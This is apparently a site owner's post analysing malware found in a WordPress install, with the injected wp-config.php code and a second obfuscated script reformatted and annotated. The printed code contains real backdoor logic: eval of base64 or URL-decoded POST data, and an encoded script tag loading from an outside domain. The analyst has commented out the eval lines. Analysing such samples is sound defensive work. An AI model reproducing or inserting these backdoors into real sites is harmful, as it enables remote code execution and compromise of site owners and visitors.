First code, that got inserted into wp-config.php. Did some formatting to make it easier to understand.

global $sessdt_o;
if (!$sessdt_o) {
    $sessdt_o = 1;
    $sessdt_k = "lb11";
    if (!@$_COOKIE[$sessdt_k]) {
        $sessdt_f = "102";
        if (!@headers_sent()) {
             //@setcookie($sessdt_k, $sessdt_f);
        } else {
            //echo "";
        }
    } else {
        if ($_COOKIE[$sessdt_k] == "102") {
            $sessdt_f = (rand(1000, 9000) + 1);
            if (!@headers_sent()) {
                //@setcookie($sessdt_k, $sessdt_f);
            } else {
                //echo "";
            }
            $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"];
            $sessdt_v = urlencode(strrev($sessdt_j));
            $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v, -200);
            //echo "";
            //echo "";
        }
    }
    $sessdt_p = "showimg";
    if (isset($_POST[$sessdt_p])) {
        //eval(base64_decode(str_replace(chr(32), chr(43), $_POST[$sessdt_p])));
        exit;
    }
}

Second code, found at / and at wp-admin/ – don’t have the file name right now.

Added some comments to debug it, not fully done yet.

$vf = substr(1,1);
foreach( array( 10,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,39,59,10,10,13,9,92,39,0,112,49,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,102,97,99,101,116,111,102,97,99,101,46,100,101,47,101,120,116,47,62,60,47,115,99,114,105,112,116,62,116,114,117,101,99,115,115) as $vj[0] ) {
	$vf.=chr($vj[0]);
}
//echo '
$vf = '; print_r(htmlentities($vf)); echo '
';
$vj[0]=substr($vf,0,1);   // newline

$vj[1]=substr($vf,1,102); // document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='

$vj[2]=substr($vf,103,3); // '

$vj[3]=substr($vf,106,6); // newline \'

$vj[4]=substr($vf,112,2); // p1

$vj[5]=substr($vf,114,-7);/* */

$vj[6]=substr($vf,-7);    // truecss
//echo '
$vj= '; print_r($vj); echo '
';

//echo '
chr(97) ' . chr(97);

//echo '
chr(97).chr(106).chr(97).chr(120) ' . chr(97).chr(106).chr(97).chr(120);

//echo '
substr( $vj[1],79,3 ) ' . substr( $vj[1],79,3 );

//echo '
chr(116).chr(120) ' . chr(116).chr(120);
if ( isset( $_GET[$vj[6]] ) ) {

	$vj[7]=0;

	if( isset( $_POST[chr(97)])){ // $_POST[a]

		$vj[7]=$_POST[chr(97)];

	}

	$vj[8]=chr(97).chr(106).chr(97).chr(120); // ajax

	$vj[9]=0;

	if ( isset( $_POST[$vj[8]] ) ){

		$vj[9]=$_POST[$vj[8]];

	}

	if ( $vj[7] == substr( $vj[1],79,3 ) && strlen( $vj[9] ) == 4 ){ //Php && ajax

		@ob_start();

		//@eval($_POST[$vj[4]]); // $_POST[p1]

		$vj[6]=$vj[1].addcslashes( htmlspecialchars( @ob_get_clean() ), $vj[3] ).$vj[2];  // document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML=' + eval + \' + '

//		echo strlen( $vj[6] ).$vj[0].$vj[6]; // strlen + newline + javascript comand;

	} else {

		$vj[0]=chr(116).chr(120); // tx

		if ( ! isset( $_POST[$vj[0]] ) ) { // $_POST[tx];

//			echo $vj[5];  /*  */

		} else {

			//@eval( urldecode( $_POST[$vj[0]] ) ); // $_POST[tx];

//			var_dump( urldecode( $_POST[$vj[0]] ) );

		}

	}

	exit;

}

unset($vf);

unset($vj);